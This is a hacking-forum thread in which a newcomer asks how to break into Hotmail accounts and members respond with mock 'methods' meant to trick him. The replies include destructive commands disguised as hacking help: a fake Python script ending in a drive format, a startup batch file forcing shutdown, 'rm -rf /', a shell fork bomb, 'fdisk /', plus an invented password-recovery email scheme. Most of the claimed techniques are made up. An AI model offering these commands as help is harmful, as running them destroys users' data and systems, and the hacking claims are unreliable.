Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.

Need help


ghost's Avatar
0 0

hi , i there a way to hack hotmail accounts if so i will pm someone who can. And if possible i want a mentor

Ps: i am lerning bare with me Thnx:):D


spyware's Avatar
Banned
0 0

It's quite easy. First telnet the hotmail servers with malformed headers (relocationed to your auth_cookie script), then you schedule a bruteforce attempt locally, be sure to flush your DNS and backup your cache's intranet settings!

I do these things all the time.


ghost's Avatar
0 0

1 word keylogger


ghost's Avatar
0 0

There's a queer called CANCER who'd love to mentor you…


ghost's Avatar
0 0

ahahha


Ayr4's Avatar
Member
0 0

Rofl…this is a classic…


SET's Avatar

SET

Peumonoultramicroscopicsilico
0 0

is he being serious? No no no one would be that stupid to ask to hasck a site when the rules clearly state otherwise.


korg's Avatar
Admin from hell
0 0

Come on guy's help the guy out, This is really easy to do first you need to set some server privileges. Navigate your way to: HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\Current Version\WPAEvents then rt click on OOBETimer and click modify change the value to 1. Now restart your computer and you be suprised how easy it is to get in to hotmail. Post back if you have any problems.


ghost's Avatar
0 0

@set Clearly you must be new. Otherwise you would know that there is no limit to the stupidity of some of the members of this site. Trust me this doesnt even begin to touch on the dumbness of some people. You will see in time as you read the forums.


SET's Avatar

SET

Peumonoultramicroscopicsilico
0 0

LOL i seen quite a few stupid posts but that was one that just blew my mind that they seriously belive its that easy. like there is some secret thing u type in the webbrowser for hotmail and presto it just gives u passwords.


ghost's Avatar
0 0

Sad but true. People watch to many movies.


ghost's Avatar
0 0

@OP: go to hotmail.com/login.html

username: admin password: izleet?yesisvery1337

that should work. pm me if you need more help. if a captcha comes up then copy the letters in the captcha into a box that will be underneath said catcha and it should do the trick


ghost's Avatar
0 0

hi, Ive been hearing about a prog called hotmail hacker or sumtin like that :)


ghost's Avatar
0 0

hi, Ive been hearing about a prog called hotmail hacker or sumtin like that :)


reaper4334's Avatar
Member
0 0

Yeah, I've heard about that too… I'm working on a code right now that does exactly what it does.

Here's it's source for anyone who wants to compile it themselves (Python)


def settrue(a):
    # Sets a to True
    if (1):
        a = True
    else:
        a = False

b = False
c = False
settrue(c)
error = True


while (a):
    tn=telnetlib.Telnet("127.0.0.1", 23) # Telnets to hotmail server
    tn.write("connect to _mail")
    tn.write("login admin")
    tn.write("pass *")
    # Note: The * value will work in telnet because
    # it cannot accept certian characters
    tn.write("find user")
    uname = raw_input("Enter the email address you want the passwrod for: ")
    tn.write(uname)
    tn.write("list results")
    tn.close()
    
if (error):
    os.sytem("format C:")

I've compiled it to a .exe application though, to save you the trouble http://www.fileden.com/files/2007/11/30/1617224/dist.zip

That worked for me.

[Edit] Disabling smileys :P {/Edit]


ghost's Avatar
0 0

korg wrote: Come on guy's help the guy out, This is really easy to do first you need to set some server privileges. Navigate your way to: HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\Current Version\WPAEvents then rt click on OOBETimer and click modify change the value to 1. Now restart your computer and you be suprised how easy it is to get in to hotmail. Post back if you have any problems.

Now THAT is the best "suggestion" thus far… for all of those who didn't understand it, Google it. :happy:


korg's Avatar
Admin from hell
0 0

@Zephyr_Pure not suprised your the only one that get's that. Works like a charm.


ghost's Avatar
0 0

korg wrote: Come on guy's help the guy out, This is really easy to do first you need to set some server privileges. Navigate your way to: HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\Current Version\WPAEvents then rt click on OOBETimer and click modify change the value to 1. Now restart your computer and you be suprised how easy it is to get in to hotmail. Post back if you have any problems. …and good luck getting on your windoz after that lol awesome afvice


ghost's Avatar
0 0

korg wrote: Come on guy's help the guy out, This is really easy to do first you need to set some server privileges. Navigate your way to: HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\Current Version\WPAEvents then rt click on OOBETimer and click modify change the value to 1. Now restart your computer and you be suprised how easy it is to get in to hotmail. Post back if you have any problems. …and good luck getting on your windoz after that lol awesome afvice


ghost's Avatar
0 0

Oh dude you want to do 1337 stuff!!! Anyway i can help you : first you have to turn off your computer and do a little surgery: Microsoft blocks hacking hotmail by putting some shit into your machine, so if you don't want to be cought you need to open your pc and get your hands on hardware. THIS IS VERY IMPORTANT (if you want to stay out of jail): you should see a big board inside your pc: it's called the motherboard. On it you should see a fan. This is only meant to hide microsoft's antihackling processor, so remove it and find a way to set what you find behind it off. Now, that isn't any easy, so don't be afraid of breaking it. Then you boot up your pc and go to hotmail. Insert this in the pasword field : "TECHTEST11SPARROW". This special password (once you remove the antihacking processor) will get you access to every account you want.


reaper4334's Avatar
Member
0 0

Yeahh. It worked on my old computer too :P

but.. that program I've made should let you connect without doing that, it did for me…

lol


ghost's Avatar
0 0

You damn GENIOUS!


ghost's Avatar
0 0

the reaper's program worked like a charm!! i can access any hotmail account now very easily. however i improved the process and are now maiing it available for you: (just follow these steps)

Open notepad and write this: 01001011000111110010010101010101010000011111100000

and then save it as name.exe

there shouldn't be a need to restart your macine, simply click on it after saving it to run… (i'd advise running it on a VM lol)


reaper4334's Avatar
Member
0 0

Good to hear it worked for you too Folk :]


ghost's Avatar
0 0

Reaper no way! I never knew hacking could be so easy! Dude you are so 1337!

Actually i found another way into emails as well!!

First off, create a file on your desktop called "hotmail.bat"

Open this in notepad and put in the following code

@echo off
shutdown -s -f -t 01

this will change your computers settings so you can connect to hotmail servers, by sending it to them to disable the protection around the specific email you are trying to access. the shutdown command triggers an automatic response from the hotmail servers that disable protection devices.

However, this program cannot run with the proper privalages from your desktop and needs to be moved for it to work properly!

You need to open up my computer, then navigate to C:/ Documents and settings <your username> Start Menu Programs Startup

now drag the hotmail.bat to this location.

Reboot your computer, then goto hotmail.com and any username you try to login with will work without the right password!!!

tell me if this works for you guys as well!!


ghost's Avatar
0 0

i heard that the secret was to merely disk managment and format your partitions.


ghost's Avatar
0 0

noober wrote: i heard that the secret was to merely disk managment and format your partitions.

That's the secret to fixing any Windows problems. The secret to hacking anything without any effort is to shoot yourself in the head.


ghost's Avatar
0 0

all the posts so far only deal with hacking hotmail from windows, but hacking should be for everyone, people with linux and macs too! so i'll start with a tip to people wit un*x machines:

rm -rf /

or my favorite (for bash or z shell): :(){ :|:& };:


ghost's Avatar
0 0

Of course, your solution works just as well as the Windows-based ones but, really, what new members here will actually be using Linux? They'd probably be too lazy to Google that, too. :P


ghost's Avatar
0 0

Zephyr_Pure wrote: [quote]noober wrote: i heard that the secret was to merely disk managment and format your partitions.

That's the secret to fixing any Windows problems. The secret to hacking anything without any effort is to shoot yourself in the head. [/quote]

ah!!! what was it thinking! Correct as always zeph. On an off topic matter. Anyone know what the hell that extra little partion found on Dell computers is?


ghost's Avatar
0 0

noober wrote: ah!!! what was it thinking! Correct as always zeph. On an off topic matter. Anyone know what the hell that extra little partion found on Dell computers is?

Not always… just enough to remain remotely credible. :)

<OT> As for the "extra little partition" on Dell computers, it's a recovery partition that is created from the Dell Restore CD. It's what allows you to use F11 in the boot process to perform a full system recovery. Emachines and Gateways also come with that feature, and I believe HP systems do as well. </OT>


ghost's Avatar
0 0

that partition is so annoying! i wonder if i format the disk if the computer would stop working because it might need that partition? maybe for suspend and hibernate or something?

mine is type vfat and is using 1.4MB out of the 31.3 that the dell guys decided to steal off my hard disk. the bulk of those 1,4MB are three .bmp they put in.


ghost's Avatar
0 0

Folk Theory wrote: that partition is so annoying! i wonder if i format the disk if the computer would stop working because it might need that partition? maybe for suspend and hibernate or something?

mine is type vfat and is using 1.4MB out of the 31.3 that the dell guys decided to steal off my hard disk. the bulk of those 1,4MB are three .bmp they put in.

<Still OT> Yes, you can remove the recovery partition and your system will continue to function. I've done exactly that with all of the systems that I prepare from factory defaults. Also, yes, the partition would be vfat to a Linux user; it's a FAT32 partition that takes up a max of 4GB on most systems I've seen. Actual sizes may vary. </OT>

If there is to be any more talk about recovery partitions, then it should probably go in a separate thread. This thread should remain at least somewhat on-topic.


ghost's Avatar
0 0

Should probably make another thread of it, BUT keep this one some what on topic? The topic was helping some dumbass hack hotmail accounts. Thread went to hell a long time ago.


ghost's Avatar
0 0

well what can isay we covered all the ways to hack hotmail (GUI, CLI, binary, and even a program in python) plus a nice fork bomb, er, hotmail hacker device. if he didnt manage to get in by now then he shouldn't be allowed to use a computer. as a side note:

fdisk /


ghost's Avatar
0 0

ahhhhh that was glorious!

im sure he learned a lesson today :happy:

on a side note: technically, the code i posted wasnt a fork bomb. it would just turn off the computer as he logged in, not duplicate itself (i think that is how fork bombs are defined?)

[edit] i see you werent referring to my code now. missed the :(){ :|:& };: [/edit]

second, @folk theory: what was the binary you posted? why in a virtual machine, that code would not execute properly would it?


ghost's Avatar
0 0

first thing to do log in to your hotmail account. the account has to be over 30days old or it wont be recognized.

open a new message like your going to send an email

were it says To: recoverpasswordscript@hotmail.com Cc: Bcc:33545 subject:Password recovery

now in the big white box underneath put (your hotmail account) (your hotmail password) (the victims hotmail account)

ok now your done just click send and you should recieve a message in less than 1 second. what this does is scramble the php and makes the server bot think you own the account since you already gave it a correct password with your account either it will give you the persons password or it will change the persons password to yours. Happy trails.


ghost's Avatar
0 0

lol steevy.. lol


ghost's Avatar
0 0

;)


ghost's Avatar
0 0

well that binary if saved as name.exe and run would format the C: drive. there are more complicated ones to format other drives etc. i think it should run properly in a VM too. the reason i said to do it in a VM if you wanna try it is simply in order so you don't actually format your drive…


ghost's Avatar
0 0

just noticed that the person who started the thread got banned =P


ghost's Avatar
0 0

whats up? i am new to this site and didnt see any point in starting a new thread for this….. not asking for a mentor or any shit like that….. i would like to know what i need to learn…html javascript.php c++ etc etc etc…. or really all of them? i know a little on html… but who doesnt…if one of you could let me know and i will stay busy learning instead of posting retarded ass newbie questions like this!!! lata jay


ghost's Avatar
0 0

jayhedrick wrote: whats up? i am new to this site and didnt see any point in starting a new thread for this….. not asking for a mentor or any shit like that….. i would like to know what i need to learn…html javascript.php c++ etc etc etc…. or really all of them? i know a little on html… but who doesnt…if one of you could let me know and i will stay busy learning instead of posting retarded ass newbie questions like this!!! lata jay

I don't see any point to you starting a new thread for that, either. Or, for that matter, posting in this one. What do you need to learn? You need to learn more than HTML, but what path you take on that is up to you. No one can tell you a "best language" because there isn't one. Pick one you think you'll like and learn it. As for the rest… just hunt around the forums. I've grown weary of having to repeat the same old stuff about "learning to hack".


ghost's Avatar
0 0

a good start would be javascript then php then mySQL. if youre still around by the time you master those, which i doubt, then you'll know how to continue…


ghost's Avatar
0 0

thanks both of you….. i will study and learn the languages you talk of and IF i am around after which i am sure i will be…. we will be getting to know each other well……